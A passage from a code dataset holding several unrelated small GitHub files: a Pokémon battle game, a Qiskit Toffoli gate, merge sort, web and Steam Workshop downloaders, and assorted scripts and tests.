invalida\")\n\n\ndef get_pokemon_attacks(attack):\n return \"{} | daño {} | tipo {}\".format(attack[\"name\"],\n attack[\"damage\"],\n attack[\"type\"])\n\n\ndef player_attack(player_pokemon, enemy_pokemon):\n\n attack = choose_attack(player_pokemon)\n\n message_combat(player_pokemon, enemy_pokemon, attack)\n\n\ndef enemy_attack(enemy_pokemon, player_pokemon):\n\n attack = enemy_pokemon[\"attacks\"][random.randint(0, len(enemy_pokemon[\"attacks\"]) - 1)]\n\n message_combat(enemy_pokemon, player_pokemon, attack)\n\n\ndef message_combat(attacker, victim, attack):\n print(\"{} ataca con {}! 
\".format(attacker[\"name\"], attack[\"name\"]))\n\n print(\"-{} para {}!\".format(attack[\"damage\"], victim[\"name\"]))\n\n victim[\"current_health\"] -= attack[\"damage\"]\n\n\ndef fight(player_profile, enemy_pokemon):\n print(\"\\n--- NUEVO COMBATE ---\\n\")\n\n attack_history = []\n\n player_pokemon = choose_pokemon(player_profile)\n\n print(\"Contrincantes: {} VS {}\".format(get_pokemon_info(player_pokemon),\n get_pokemon_info(enemy_pokemon)))\n\n while any_player_pokemon_lives(player_profile) and enemy_pokemon[\"current_health\"] > 0:\n \n action = None\n\n while action not in [\"A\", \"P\", \"V\", \"C\", \"I\"]:\n\n action = input(\"¿Que deseas hacer?: [A]tacar, [C]ambiar, [I]tems, [P]okeball, Poción de [V]ida\\n\")\n\n if action == \"A\":\n \n if player_pokemon[\"current_health\"] > 0: \n\n player_attack(player_pokemon, enemy_pokemon)\n\n attack_history.append(player_pokemon)\n\n\n\n elif action == \"V\":\n \n \n #Si el usuario tiene curas en el inventario, se aplica 50, hasta llegar a 100ps\n\n #Si el usuario no tiene no cura\n\n cure_pokemon(player_profile, player_pokemon)\n\n elif action == \"P\":\n\n #pruebas(player_profile, enemy_pokemon)\n #Si el usuario tiene pokeballs en el inventario, capturara, con cierta probabilidad\n\n #relativa a la salud restante del pokemon, cuando se captura, pasa al inventario con la misma salud y toh.\n\n capture_with_pokeball(player_profile, enemy_pokemon)\n\n\n\n elif action == \"C\":\n\n player_pokemon = choose_pokemon(player_profile)\n\n elif action == \"I\":\n print(\"Tienes {} pokeballs y {} pociónes de vida\".format(player_profile[\"pokeballs\"],player_profile[\"health_potion\"]))\n\n if enemy_pokemon[\"current_health\"] > 0:\n \n enemy_attack(enemy_pokemon, player_pokemon)\n\n if player_pokemon[\"current_health\"] == 0 and any_player_pokemon_lives(player_profile):\n\n player_pokemon = choose_pokemon(player_profile)\n\n \n\n\n if enemy_pokemon[\"current_health\"] <= 0:\n\n print(\"\\n{} es derrotado!!\".format(enemy_pokemon[\"name\"]))\n\n item_lottery(player_profile) \n\n assign_exp(attack_history)\n \n\n\n\n\n# if enemy_pokemon[\"current_health\"] <= 0:\n# print(\"\\n{} es derrotado!!\".format(enemy_pokemon[\"name\"]))\n# item_lottery(player_profile)\n \n print(\"\\n--- FIN DEL COMBATE ---\\n\")\n\n input(\"Preciona ENTER para continuar...\")\n\n return player_profile\n\n\ndef item_lottery(player_profile):\n choice = random.choice([\"pokeballs\", \"health_potion\", \"health_potion\"])\n \n player_profile[choice] += 1\n\n if choice == \"pokeballs\":\n item = \"pokeball\"\n else:\n item = \"pocion de vida\"\n\n\n print(\"\\nHas obtenido una {}!! \".format(item))\n return player_profile\n\n\ndef assign_exp(attack_history):\n\n \n\n for pokemon in attack_history:\n\n points = random.randint(1, 5)\n\n \n\n pokemon[\"current_exp\"] += points\n\n if pokemon[\"current_exp\"] > 20:\n\n pokemon[\"current_exp\"] -= 20\n\n pokemon[\"level\"] += 1\n\n pokemon[\"current_health\"] = pokemon[\"base_health\"]\n\n print(\"Tu pokemon ha subido al nivel {}\".format(get_pokemon_info(pokemon)))\n\n\ndef cure_pokemon(player_profile, player_pokemon):\n\n if player_profile[\"health_potion\"] > 0:\n player_pokemon[\"current_health\"] += 50\n if player_pokemon[\"current_health\"] > player_pokemon[\"base_health\"]:\n player_pokemon[\"current_health\"] == player_pokemon[\"base_health\"]\n player_profile[\"health_potion\"] -= 1\n print(\"\\nHas usado una pocion de vida! 
+50 para {}\".format(player_pokemon[\"name\"]))\n\n return player_pokemon, player_profile\n else:\n print(\"No Tienes Poción\")\n\n\ndef capture_with_pokeball(player_profile, enemy_pokemon):\n \n if player_profile[\"pokeballs\"] > 0:\n random_num = random.randint(1, 64)\n \n if enemy_pokemon[\"current_health\"] <= 35 and random_num == 1 \\\n or enemy_pokemon[\"current_health\"] <= 30 and random_num <= 2 \\\n or enemy_pokemon[\"current_health\"] <= 25 and random_num <= 4 \\\n or enemy_pokemon[\"current_health\"] <= 20 and random_num <= 8 \\\n or enemy_pokemon[\"current_health\"] <= 15 and random_num <= 16 \\\n or enemy_pokemon[\"current_health\"] <= 10 and random_num <= 32 \\\n or enemy_pokemon[\"current_health\"] <= 5 and random_num <= 64 :\n print(\"Lo has capturado!\")\n player_profile[\"pokemon_inventory\"] += enemy_pokemon.copy(),\n enemy_pokemon[\"current_health\"] = 0\n return player_profile\n \n else:\n print(\"Fallaste\")\n \n pass\n\n player_profile[\"pokeballs\"] -= 1\n else:\n print(\"No Tienes pokeballs\")\n\n\ndef pruebas(player_profile, enemy_pokemon):\n # pprint(player_profile)\n # Buscamos los datos del pokemon\n # pprint(player_profile[\"pokemon_inventory\"])\n # obtenemos uno solo\n \"\"\" for h in range(len(player_profile[\"pokemon_inventory\"])):\n print(\"\\nLa vida actual del pokemon {} es {}\".format(player_profile[\"pokemon_inventory\"][h][\"name\"], player_profile[\"pokemon_inventory\"][h][\"current_health\"]))\n\n\n\n ataques = []\n for i in range(len(player_profile[\"pokemon_inventory\"][h][\"attacks\"])):\n\n ataques.append(player_profile[\"pokemon_inventory\"][h][\"attacks\"][i][\"name\"])\n \n \n\n\n print(\"y sus ataques son {}\".format(\",\".join(ataques)))\n print(\"\\n\")\n \"\"\"\n \ndef main():\n pokemon_list = get_all_pokemons()\n player_profile = get_player_profile(pokemon_list)\n\n # enemy_pokemon = random.choice(pokemon_list)\n\n # pruebas(player_profile, enemy_pokemon)\n \n while any_player_pokemon_lives(player_profile):\n\n while True:\n enemy_pokemon = random.choice(pokemon_list)\n if enemy_pokemon[\"current_health\"] > 0:\n break\n fight(player_profile, enemy_pokemon)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"YisHub/Pokemon_Fight","sub_path":"Pokemon_fight.py","file_name":"Pokemon_fight.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30288508237","text":"import matplotlib.pyplot as plt\r\n\r\ndef suite_fibonacci (n):\r\n F0 , F1 = 0 , 1\r\n if n <= 1:\r\n return n\r\n else:\r\n return suite_fibonacci(n-1) + suite_fibonacci(n-2)\r\n\r\nnbr_rep = int(input(\"Entrez le nombre de répétitions : \"))\r\ny = []\r\nfor i in range(nbr_rep):\r\n y.append(suite_fibonacci(i))\r\n\r\nphi = y[-1]/y[-2]\r\nprint(f\"Nombre d'or : {phi} \\navec les termes {y[-1]} et {y[-2]} sur {nbr_rep} répétitions\")\r\n\r\nplt.plot(y)\r\nplt.title(\"Suite de Fibonacci\")\r\nplt.xlabel(r'$\\mathrm{x}$')\r\nplt.ylabel(r\"$F(\\mathrm{x})$\")\r\nplt.show()","repo_name":"Guamss/suite_fibonacci","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14350400769","text":"import itertools\nimport math\n\nfrom qiskit import QuantumRegister, QuantumCircuit, ClassicalRegister\nfrom qiskit.circuit import Gate, InstructionSet\nfrom qiskit.dagcircuit import DAGCircuit\nfrom qiskit.extensions.standard import *\nfrom qiskit.qasm 
import pi\n\n\ndef toffoli(number_qubits: int):\n assert number_qubits >= 2\n q = QuantumRegister(number_qubits)\n qc = QuantumCircuit(q, name=\"toffoli\")\n # for i in range(number_qubits-1):\n # qc.h(controls[i])\n qc.ntoffoli(q[number_qubits-1], *q[0:number_qubits-1])\n # qc.measure(controls, c_controls)\n # qc.measure(target, c_target)\n return qc\n\nclass NcrxGate(Gate):\n \"\"\"n-controlled x rotation gate.\"\"\"\n\n def __init__(self, theta, tgt, *ctls, circ=None):\n \"\"\"Create new Toffoli gate.\"\"\"\n assert len(ctls) >= 1\n super().__init__(f\"c^{len(ctls)}rx\", [theta], [tgt] + list(ctls), circ)\n\n def _define_decompositions(self):\n decomposition = DAGCircuit()\n nr_qubits = len(self.qargs)\n q = QuantumRegister(nr_qubits)\n last_control = q[1]\n target = q[0]\n decomposition.add_qreg(q)\n if nr_qubits == 2:\n # Equal to crx of theta\n crx_theta = Cu3Gate(self.params[0], -pi/2, pi/2, last_control, target)\n decomposition.apply_operation_back(crx_theta)\n else:\n # Recurse\n rule = [\n # C-sqrt(rx(theta)) gate\n Cu3Gate(self.params[0]/2, -pi/2, pi/2, last_control, target),\n NcrxGate(pi, last_control, *q[2:]), # toffoli\n Cu3Gate(self.params[0]/2, -pi/2, pi/2, last_control, target).inverse(),\n NcrxGate(pi, last_control, *q[2:]), # toffoli\n NcrxGate(self.params[0]/2, target, *q[2:]) # c^nrx(theta/2) gate on n-1 qubits\n ]\n for inst in rule:\n decomposition.apply_operation_back(inst)\n # decomposition.apply_operation_back(ToffoliGate(q[1], q[2], q[0]))\n self._decompositions = [decomposition]\n\n def inverse(self):\n \"\"\"Invert this gate.\"\"\"\n return self # self-inverse\n\n def reapply(self, circ):\n \"\"\"Reapply this gate to corresponding qubits in circ.\"\"\"\n self._modifiers(circ.ncrx(self.params[0], self.qargs[0], *self.qargs[1:]))\n\ndef ncrx(self, theta, tgt, *ctls):\n \"\"\"Apply n-controlled x-rotation(theta) to target from controls\"\"\"\n if all(isinstance(ctl, QuantumRegister) for ctl in ctls) and \\\n isinstance(tgt, QuantumRegister) and \\\n all(len(ctl) == len(tgt) for ctl in ctls):\n instructions = InstructionSet()\n for i in range(ctls[0].size):\n instructions.add(self.ntoffoli(theta, (tgt, i), *zip(ctls, itertools.repeat(i))))\n return instructions\n\n for ctl in ctls:\n self._check_qubit(ctl)\n self._check_qubit(tgt)\n self._check_dups(list(ctls) + [tgt])\n return self._attach(NcrxGate(theta, tgt, *ctls, circ=self))\n\ndef ntoffoli(self, tgt, *ctls):\n \"\"\"Apply n-controlled Toffoli to tgt with controls.\"\"\"\n if all(isinstance(ctl, QuantumRegister) for ctl in ctls) and \\\n isinstance(tgt, QuantumRegister) and \\\n all(len(ctl) == len(tgt) for ctl in ctls):\n instructions = InstructionSet()\n for i in range(ctls[0].size):\n instructions.add(self.ntoffoli((tgt, i), *zip(ctls, itertools.repeat(i))))\n return instructions\n\n for ctl in ctls:\n self._check_qubit(ctl)\n self._check_qubit(tgt)\n self._check_dups(list(ctls) + [tgt])\n return self._attach(NcrxGate(pi, tgt, *ctls, circ=self))\n\nQuantumCircuit.ncrx = ncrx\nQuantumCircuit.ntoffoli = ntoffoli\n","repo_name":"eddieschoute/circuit-benchmarks","sub_path":"circuit_benchmarks/toffoli.py","file_name":"toffoli.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"32902631370","text":"def merge_sort(arr):\n if len(arr) < 2:\n return arr\n \n mid = len(arr) // 2\n left = arr[:mid]\n right = arr[mid:]\n\n left = merge_sort(left)\n right = merge_sort(right)\n\n return merge(left, right)\n\ndef 
merge(left, right):\n sorted_list = []\n len_left = len(left)\n len_right = len(right)\n i,j = 0,0\n\n while i < len_left and j < len_right:\n if left[i] <= right[j]:\n sorted_list.append(left[i])\n i += 1\n else:\n sorted_list.append(right[j])\n j += 1\n \n if i < len_left:\n for l in range(i, len_left):\n sorted_list.append(left[l])\n if j < len_right:\n for r in range(j, len_right):\n sorted_list.append(right[r])\n return sorted_list\n\nif __name__ == \"__main__\":\n nums = [7, 2, 1, 6, 8, 5, 3, 4]\n nums = merge_sort(nums)\n print(nums)","repo_name":"renyitan/data-structures-and-algorithms","sub_path":"python/algorithms/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23082573856","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/10/11 上午9:10\n# @Author : Hou Rong\n# @Site : \n# @File : test_images_task.py\n# @Software: PyCharm\nimport sys\n\n# sys.path.append('/data/lib')\nprint(sys.path)\nfrom proj.my_lib.Common.Task import Task\nfrom proj.total_tasks import images_task\n\nif __name__ == '__main__':\n # get_images(\n # **{\n # 'source': \"booking\",\n # 'new_part': \"detail_hotel_booking_20170929a\",\n # 'target_url': \"https://q.bstatic.com/images/hotel/max1024x768/135/13504008.jpg\",\n # 'desc_path': \"/data/nfs/image/img_hotel_booking_20170929a_filter\",\n # 'is_poi_task': False,\n # 'source_id': \"287127\",\n # 'part': \"20170929a\",\n # 'file_path': \"/data/nfs/image/img_hotel_booking_20170929a\",\n # \"task_name\": \"images_hotel_booking_20170929a\",\n # \"task_response\": TaskResponse()\n # }\n # )\n\n # get_images(\n # **{\n # 'source': \"daodao\",\n # 'new_part': \"detail_attr_daodao_20171010a\",\n # 'target_url': \"https://ccm.ddcdn.com/ext/photo-s/0e/10/3c/6e/the-much-photographed.jpg\",\n # 'desc_path': \"/data/nfs/image/img_attr_daodao_20171010a_filter\",\n # 'is_poi_task': True,\n # 'source_id': \"7753114\",\n # 'part': \"20171010a\",\n # 'file_path': \"/data/nfs/image/img_attr_daodao_20171010a\",\n # \"task_name\": \"images_hotel_booking_20170929a\",\n # \"task_response\": TaskResponse()\n # }\n # )\n\n # get_images(\n # **{\n # 'source': \"booking\",\n # 'new_part': \"detail_hotel_booking_20170929a\",\n # 'target_url': \"https://s-ec.bstatic.com/images/hotel/max1024x768/337/33766112.jpg\",\n # 'desc_path': \"/data/nfs/image/img_hotel_booking_20170929a_filter\",\n # 'is_poi_task': False,\n # 'source_id': \"76675\",\n # 'part': \"20170929a\",\n # 'file_path': \"/data/nfs/image/img_hotel_booking_20170929a\",\n # \"task_name\": \"images_hotel_booking_20170929a\",\n # \"task_response\": TaskResponse()\n # }\n # )\n\n # get_images(\n # **{\n # 'source': \"daodao\",\n # 'new_part': \"detail_rest_daodao_20170928a\",\n # 'target_url': \"https://ccm.ddcdn.com/ext/photo-w/05/9d/be/f4/spaghetti-ai-ricci-di.jpg\",\n # 'desc_path': \"/data/nfs/image/img_rest_daodao_20170928a_filter\",\n # 'is_poi_task': True,\n # 'source_id': \"4697785\",\n # 'part': \"20170928a\",\n # 'file_path': \"/data/nfs/image/img_rest_daodao_20170928a\",\n # \"task_name\": \"images_rest_daodao_20170928a\",\n # \"task_response\": TaskResponse()\n # }\n # )\n\n # get_images(\n # **{\n # 'source': \"huantaoyou\",\n # 'new_part': \"image_wanle_huantaoyou_20171023a\",\n # 'target_url': \"http://img.huantaoyou.com/PUB/TH/TH00194/IM_3469e694e140462c93829c3469a69084.png\",\n # 'desc_path': \"/data/nfs/image/img_wanle_huantaoyou_20171023a_filter\",\n # 
'is_poi_task': True,\n # 'source_id': \"test\",\n # 'part': \"20171023a\",\n # 'file_path': \"/data/nfs/image/img_wanle_huantaoyou_20171023a\",\n # \"task_name\": \"image_wanle_huantaoyou_20171023a\",\n # \"task_response\": TaskResponse()\n # }\n # )\n\n # get_images(\n # **{\n # 'source': \"ctrip\",\n # 'new_part': \"detail_hotel_ctrip_20170929a\",\n # 'target_url': \"//dimg04.c-ctrip.com/images/220n0h0000008txhgD341_W_1600_1200_Q70.jpg\",\n # 'desc_path': \"/data/nfs/image/img_hotel_ctrip_20170929a_filter\",\n # 'is_poi_task': False,\n # 'source_id': \"7491732\",\n # 'part': \"20170929a\",\n # 'file_path': \"/data/nfs/image/img_hotel_ctrip_20170929a\",\n # \"task_name\": \"images_hotel_ctrip_20170929a\",\n # \"task_response\": TaskResponse()\n # }\n # )\n task = Task(_worker='proj.total_tasks.images_task', _task_id='176ddbc7960c2a6f6d8d7c9baea65617', _source='tuniuGT',\n _type='DownloadImages',\n _task_name='image_GT_tuniu_20180414',\n _used_times=0, max_retry_times=6,\n # kwargs={\"source\": \"daodao\", \"new_part\": \"detail_attr_daodao_20171122a\",\n # \"target_url\": \"https://ccm.ddcdn.com/ext/photo-s/0f/dd/44/61/peaceful-time.jpg\",\n # \"source_id\": \"test\", \"bucket_name\": \"mioji-attr\", \"is_poi_task\": True, \"part\": \"20171122a\",\n # \"file_prefix\": \"\"},\n # kwargs={\n # \"source\": \"ihg\",\n # \"new_part\": \"detail_hotel_ihg_20171220a\",\n # \"target_url\": \"https://ihg.scene7.com/is/image/ihg/candlewood-suites-idaho-falls-3053752126-4x3?fmt=png-alpha\",\n # \"source_id\": \"idapd\",\n # \"bucket_name\": \"mioji-hotel\",\n # \"is_poi_task\": False,\n # \"part\": \"20171220a\",\n # \"file_prefix\": \"\"\n # },\n kwargs={\n 'file_prefix': 'tuniuGT',\n 'target_url': \"https://m.tuniucdn.com//fb2/t1/G3/M00/3D/0B/Cii_LlloJcyIGfs2AFyrXaRNclAAADnOgNM364AXKt1824_w640_h480_c1_t0.jpg\",\n 'source_id': \"210138695\",\n 'need_insert_db': True,\n 'source': \"tuniuGT\",\n 'bucket_name': 'mioji-grouptravel',\n 'is_poi_task': True,\n },\n _queue='file_downloader', _routine_key='file_downloader',\n list_task_token='', task_type=0\n )\n # kwargs={'source': \"huantaoyou\",\n # 'new_part': \"image_wanle_huantaoyou_20171023a\",\n # 'target_url': \"http://img.huantaoyou.com/PUB/TH/TH00194/IM_3469e694e140462c93829c3469a69084.png\",\n # 'is_poi_task': True,\n # 'source_id': \"test\",\n # 'part': \"20171023a\",\n # 'bucket_name': 'mioji-wanle',\n # 'file_prefix': 'anc'\n # })\n images_task(task=task)\n","repo_name":"20113261/platform_service","sub_path":"test/_test_images_task.py","file_name":"_test_images_task.py","file_ext":"py","file_size_in_byte":6222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1192378854","text":"\"\"\"\n在百度和360搜索引擎上搜索关键字\n百度搜索引擎关键词接口:http:www.baidu.com/s?wd=keyword\n360:http://www/so/com/s?q=keyword\n\"\"\"\nimport requests\n\nurl = 'http://www.baidu.com/s'\nkeyword = {\"wd\": \"python\"}\ntry:\n c = requests.get(url, params=keyword)\n c.raise_for_status()\n print(c.request.url)\n print(c.text[0:1000])\nexcept:\n print('爬取失败')\n","repo_name":"xxyhhd/Crawler","sub_path":"baidu_search.py","file_name":"baidu_search.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19739899161","text":"import unittest\n\n\nfrom kimchi.osinfo import lookup, modern_version_bases, _get_arch\n\n\nclass OSInfoTests(unittest.TestCase):\n def test_default_lookup(self):\n entry = lookup(None, None)\n 
self.assertEquals('unknown', entry['os_distro'])\n self.assertEquals('unknown', entry['os_version'])\n self.assertEquals(['default'], entry['networks'])\n\n def test_old_distros(self):\n old_versions = {'debian': '5.0', 'ubuntu': '7.04', 'opensuse': '10.1',\n 'centos': '5.1', 'rhel': '5.1', 'fedora': '15'}\n for distro, version in old_versions.iteritems():\n entry = lookup(distro, version)\n self.assertEquals(entry['disk_bus'], 'ide')\n self.assertEquals(entry['nic_model'], 'e1000')\n\n def test_modern_bases(self):\n for distro, version in modern_version_bases[_get_arch()].iteritems():\n entry = lookup(distro, version)\n self.assertEquals(entry['disk_bus'], 'virtio')\n self.assertEquals(entry['nic_model'], 'virtio')\n\n def test_modern_distros(self):\n modern_versions = {'debian': '7.0', 'ubuntu': '12.04',\n 'opensuse': '12.3', 'centos': '6.4', 'rhel': '6.3',\n 'fedora': '18', 'gentoo': '12.1'}\n for distro, version in modern_versions.iteritems():\n entry = lookup(distro, version)\n self.assertEquals(entry['disk_bus'], 'virtio')\n self.assertEquals(entry['nic_model'], 'virtio')\n","repo_name":"gouzongmei/t1","sub_path":"tests/test_osinfo.py","file_name":"test_osinfo.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8633723103","text":"a = (\"ayooooo\") #a is equal to the string \"ayooooo\"\nb = (\" this is my function\") #b is equal to the string, \" this is my function\"\n \ndef appendString(a,b): #def means to define. append means to add/combine and in this case, it means to \n return a+b #combine a and b. \n\nz=appendString(a,b) #z equals to combined string of a and b. \n\nprint(z) #the answer \n\n\n\nx=input(\"what you want in list\") #this is another way\nlist = {} \n \ndef app(x): \n list.append(x)\n\napp(input) \nprint(list)\n","repo_name":"Achyut-Labs/python-seva","sub_path":"class-8/excercise/Krishastringappending.py","file_name":"Krishastringappending.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"12531619182","text":"import os\nimport logging\nfrom datetime import datetime\nimport time\n\nnow = datetime.now()\nfilename = f'logs/airflow-logs{now}-{now.hour}-{now.minute}-{now.second}'\nlogging.basicConfig(filename=filename, encoding='utf-8', level=logging.DEBUG)\n\ndef get_airflow_run_duration(num_runs, filesize, num_executors, executor_mem):\n duration = 0\n for i in range(num_runs):\n print(f\"This is run number {i+1}\")\n run_bash_command(f\"airflow variables set filesize {filesize}\")\n run_bash_command(f\"airflow variables set num_executors {num_executors}\")\n run_bash_command(f\"airflow variables set executor_mem {executor_mem}\")\n start = time.time()\n run_bash_command(\"airflow tasks test wordcount_dag count_words_task 2021-08-30\")\n end = time.time()\n duration += (end - start)\n return round((duration / num_runs), 2)\n\ndef write_file(input_1, input_2, input_3, input_4):\n with open('results_executor_mem.csv', 'a') as f:\n f.write(f\"{input_1},{input_2},{input_3},{input_4}\\n\")\n\ndef run_bash_command(command):\n stream = os.popen(command)\n logging.debug(stream.read())\n\ndef main():\n filesize = 1000000\n NUM_RUNS = 3\n executor = 4\n executor_mem = [\"20M\", \"50M\", \"100M\", \"1G\", \"4G\"]\n write_file(input_1=\"size\", input_2=\"average_time\", input_3=\"num_executors\", input_4=\"executor_mem\")\n for mem in executor_mem:\n average_time = 
get_airflow_run_duration(\n num_runs=NUM_RUNS,\n filesize=filesize,\n num_executors=executor,\n executor_mem=mem)\n print(f\"\"\"\nTime taken for wordcount,\nfilesize: {filesize}\nwith num executors {executor}\nis {average_time:.2f} seconds\"\"\")\n write_file(input_1=filesize, input_2=average_time, input_3=executor, input_4=mem)\n\nif __name__ == \"__main__\":\n main()\n ","repo_name":"ryanlow-tw/airflow-testing","sub_path":"run_executor_mem.py","file_name":"run_executor_mem.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3651999076","text":"import re\r\nimport pickle\r\nfrom xpinyin import Pinyin\r\nfrom collections import defaultdict\r\n\r\ndef main():\r\n with open('F://poem.txt', 'r') as f:\r\n poems = f.readlines()\r\n\r\n sents = []\r\n for poem in poems:\r\n parts = re.findall(r'[\\s\\S]*?[。?!]', poem.strip())\r\n for part in parts:\r\n if len(part) >= 5:\r\n sents.append(part)\r\n\r\n poem_dict = defaultdict(list)\r\n for sent in sents:\r\n print(part)\r\n head = Pinyin().get_pinyin(sent, tone_marks='marks', splitter=' ').split()[0]\r\n poem_dict[head].append(sent)\r\n\r\n with open('./poemDict.pk', 'wb') as f:\r\n pickle.dump(poem_dict, f)\r\n\r\nmain()","repo_name":"percent4/Shicijielong","sub_path":"poem_sent_dict.py","file_name":"poem_sent_dict.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"38957272610","text":"import urllib.request\r\nfrom urllib.request import urlopen, Request\r\nimport sys\r\nimport os\r\nimport requests\r\nimport wget\r\nfrom bs4 import BeautifulSoup\r\n\r\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3'}\r\ni = 0\r\ndef download(url,folder):\r\n\tglobal i\r\n\twith requests.get(url, stream=True) as r:\r\n\t\tr.raise_for_status()\r\n\t\tif \"?\" in url:\r\n\t\t\turl = url.split(\"?\")[-2]\r\n\t\ttry:\r\n\t\t\twith open(folder+'/'+str(i)+url.split('/')[-1], 'wb') as f:\r\n\t\t\t\tfor chunk in r.iter_content(chunk_size=8192): \r\n\t\t\t\t\tf.write(chunk)\r\n\t\t\t\ti=i+1\r\n\t\texcept Exception as e:\r\n\t\t\tprint(e)\r\ntry:\r\n\tos.mkdir(sys.argv[2])\r\n\treq = Request(url=sys.argv[1], headers=headers)\r\n\tdatos = urllib.request.urlopen(req).read().decode()\r\n\tsoup = BeautifulSoup(datos,features=\"html.parser\")\r\n\t\r\n\t# to images\r\n\ttags = soup('img')\r\n\tfor tag in tags:\r\n\t\turl = tag.get('src')\r\n\t\tif not 'data:' in url:\r\n\t\t\tif 'http' in url:\r\n\t\t\t\tdownload(url,sys.argv[2])\r\n\t\t\telse:\r\n\t\t\t\tif url[0]==\"/\":\r\n\t\t\t\t\tsplit_url = sys.argv[1].split('/')\r\n\t\t\t\t\turl = split_url[0]+\"//\"+split_url[2]+url \r\n\t\t\t\telse:\r\n\t\t\t\t\turl = sys.argv[1]+\"/\"+url \r\n\t\t\t\tdownload(url,sys.argv[2])\r\n\t\t\t\t\r\n\t# to files\t\r\n\tfiles = soup('a')\r\n\tfor file in files:\r\n\t\turl = file.get('href')\r\n\t\tif url:\r\n\t\t\tif \"?\" in url:\r\n\t\t\t\turl = url.split(\"?\")[-2]\r\n\t\t\tif 'http' in url:\r\n\t\t\t\tif url.endswith(\".pdf\") or url.endswith(\".doc\") or url.endswith(\".docx\") or url.endswith(\".xls\") or url.endswith(\".xlsx\"):\r\n\t\t\t\t\tdownload(url,sys.argv[2])\r\n\t\t\telse:\r\n\t\t\t\tif url.endswith(\".pdf\") or url.endswith(\".doc\") or url.endswith(\".docx\") or url.endswith(\".xls\") or url.endswith(\".xlsx\"):\r\n\t\t\t\t\tif url[0]==\"/\":\r\n\t\t\t\t\t\tsplit_url = 
sys.argv[1].split('/')\r\n\t\t\t\t\t\turl = split_url[0]+\"//\"+split_url[2]+url \r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\turl = sys.argv[1]+\"/\"+url \r\n\t\t\t\t\tdownload(url,sys.argv[2])\r\n\t\t\t\r\n\tprint(\"Successfully completed\")\r\nexcept Exception as e:\r\n\tprint(\"ERROR: can't get files, check its parameters or contact the developer.\")\r\n\tprint(e)","repo_name":"castro-miguel-1993/pyfiles","sub_path":"pyfiles.py","file_name":"pyfiles.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19688315764","text":"# ABC-165 B - 1%\n# https://atcoder.jp/contests/abc165/tasks/abc165_b\n#\ndef getInt():\n return int(input())\n\n\ndef main():\n x = getInt()\n\n a = 100\n c = 0\n while a < x:\n a += a // 100\n c += 1\n print(c)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"hyperdb/AtCoderPy","sub_path":"ABC/101-200/161-170/ABC-165-B.py","file_name":"ABC-165-B.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20334523659","text":"#!/usr/bin/python3\n\nimport sys\nimport getopt\nimport os\nimport urllib.request\nimport urllib.parse\nfrom urllib.error import HTTPError, URLError\nimport json\nimport time\nimport threading\n\n# Downloading a large collection at once on a new install of L4D2 may cause errors on bootup.\n# Set this if you'd like to cap the amount of downloads at once. (Undownloaded plugins will resume\n# next time the script launches). 0 = don't limit downloads.\ng_iLimitDownloads = 0\n\ndef safe_print(*objects, errors='ignore', **kwargs):\n '''\n An ascii-only print function to avoid encoding issues.\n '''\n print(*(str(t).encode('ascii', errors=errors).decode('ascii') for t in objects), **kwargs)\n\ndef usage(cmd, exit):\n print(\"usage: \" + cmd + \" [-o ] []...\" \\\n \" \")\n sys.exit(exit)\n\nconst_urls = {\n 'file': \"http://api.steampowered.com/ISteamRemoteStorage/\" \\\n \"GetPublishedFileDetails/v1\",\n 'collection': \"http://api.steampowered.com/ISteamRemoteStorage/\" \\\n \"GetCollectionDetails/v0001\"\n}\n\nconst_data = {\n 'file': {'itemcount': 0, 'publishedfileids[0]': 0},\n 'collection': {'collectioncount': 0, 'publishedfileids[0]': 0}\n}\n\ndownload_lock = threading.Lock()\n\ndef download_plugins_concurrently(output_dir, plugins, old_plugins):\n fail = []\n succeed = {}\n error = 0\n downloads = 0\n\n def download_plugin(plugin):\n nonlocal error, downloads\n if 'file_url' in plugin:\n plugin_display_name = '\"{title}\" ({publishedfileid}.vpk)'.format(**plugin)\n if plugin['publishedfileid'] in old_plugins and \\\n old_plugins[plugin['publishedfileid']]['time_updated'] == \\\n plugin['time_updated']:\n safe_print(\"Plugin \" + plugin_display_name + \" already up-to-date\")\n succeed[plugin['publishedfileid']] = {k: plugin[k] for k in ('title', 'time_updated') if k in plugin}\n else:\n try:\n name = plugin['publishedfileid'] + \".vpk\"\n safe_print(\"Downloading \" + plugin_display_name)\n path = os.path.join(output_dir, name)\n urllib.request.urlretrieve(plugin['file_url'], path)\n print(\"Downloading complete\")\n succeed[plugin['publishedfileid']] = {k: plugin[k] for k in ('title', 'time_updated') if k in plugin}\n downloads 